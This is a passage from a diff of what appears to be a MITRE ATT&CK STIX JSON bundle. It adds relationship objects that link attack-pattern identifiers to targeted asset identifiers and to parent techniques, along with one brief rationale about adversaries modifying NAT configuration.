"3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4b036ee-be86-48cb-9f01-ab8f78e5bb37", + "created": "2023-09-28T20:15:05.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:15:05.405Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4bce050-cc43-4e32-9c10-c3e6cd5a7736", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4c069e8-7ec4-493b-8c12-1731809befc7", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4dd7251-ed87-4629-86b5-090e52a82df2", + "created": "2024-04-09T21:00:32.387Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T21:00:32.387Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c507e109-eba7-4d90-b946-38a2c36d2128", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c51d2f0e-be46-4b78-99af-2d446f2ae473", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c52eec8a-ae3c-4721-96e1-029006af179b", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c535a1fe-5aaa-48d8-a930-b108fded9013", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c535d995-bafd-47a3-9417-26e2e1080eb7", + "created": "2020-01-24T15:51:52.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c53e4807-05e4-46d2-9cb9-fd6301ac3738", + "created": "2020-02-11T18:42:35.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c54ccdc7-ed15-45c7-bfc9-f6e6e2b0d7f3", + "created": "2020-01-30T16:36:51.584Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "target_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c5524919-90ad-4b2d-a461-761008cccf09", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c5589abe-78a2-4d41-8926-33aa3fc3337b", + "created": "2020-03-13T20:10:00.218Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c55f9328-a115-40e7-9c83-91c5c7c979e1", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c569edc3-cc41-441b-8e9f-ff9889fb72d8", + "created": "2024-06-27T09:03:30.889Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:03:30.889Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c56f5807-b743-4ba7-88e3-29241c8b52fb", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c58563a8-d757-4476-8ae2-beb2acce38b3", + "created": "2023-10-02T20:20:55.473Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:20:55.473Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c596f45a-ad65-4673-b316-05378175f35e", + "created": "2024-04-09T20:54:19.196Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:54:19.196Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c5a69738-3e80-421d-aba2-bdab8a4029fd", + "created": "2023-09-29T18:43:49.839Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:43:49.839Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c5f40627-a177-465a-803e-18a3a81da0c6", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c5f57bf0-0a53-4021-ad61-33ed53e33daa", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c6270eb4-4508-4bb3-9e92-5dc5cd53988e", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c63634d6-e063-432c-b819-c58fcbcbe96b", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c63812f2-0832-466e-b2a8-11193f304242", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c63b184f-ce30-4171-8f95-26e0a1373e3e", + "created": "2024-06-27T09:22:34.796Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:22:34.796Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c640c6d3-e2b6-4546-80e5-7bcfae79f078", + "created": "2024-05-22T17:19:22.624Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:18:02.068Z", + "description": "Asset Mapping Rationale: Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks.", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c65e39eb-f6d1-4e3a-9070-b2fa7ea35b36", + "created": "2023-09-28T21:27:50.246Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:27:50.246Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c68031a0-e181-4895-93e8-eca2598e9538", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c6a05c20-02d4-42ce-ad5c-280c604e13d8", + "created": "2023-09-29T17:59:11.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:59:11.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c6a3ab9f-8136-4965-a765-261d95b433e6", + "created": "2023-03-14T14:38:03.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-14T14:38:03.823Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c6cb54d5-9c60-43a5-b881-d88d6265c795", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c6d03516-105e-4077-acce-18b5a6457bc9", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c6ebafbb-f23b-4104-9042-a614e4c573e7", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c73ab7fb-9a04-47fd-a55d-fe308a10ea10", + "created": "2024-06-27T09:08:57.376Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:08:57.376Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c75a23c5-6101-44be-a0d6-712ca67e8519", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c772ae4f-7d22-42a5-8dc1-9b6ef601d14b", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c77988ef-13ea-4c08-9765-a520c03a774e", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c79a063e-0c41-4086-a363-00b52f5a1b38", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + 